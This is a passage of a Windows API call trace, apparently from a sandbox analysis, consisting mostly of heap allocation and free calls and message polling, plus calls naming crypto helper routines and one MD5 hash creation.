0x2e50d40 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0222.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0222.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.908] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0222.908] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f68 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f530 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0222.908] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0222.908] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0222.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0222.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0222.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0222.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0222.909] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.909] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0222.909] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0222.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0222.910] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f040a8 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0222.910] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0222.910] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0222.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5d0 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0222.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.912] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3c8 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0222.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0222.913] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f4e0 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.913] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0222.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0222.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0222.913] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.913] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f046c8 [0222.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0222.913] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0222.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.914] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.914] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.914] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0222.914] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0222.956] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.956] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.956] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0222.956] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0222.956] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.956] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.957] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e514c0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0222.957] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0222.957] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.958] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.958] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0222.959] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.959] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f738 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.960] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.961] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.961] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.961] RtlAllocateHeap (HeapHandle=0x970000, 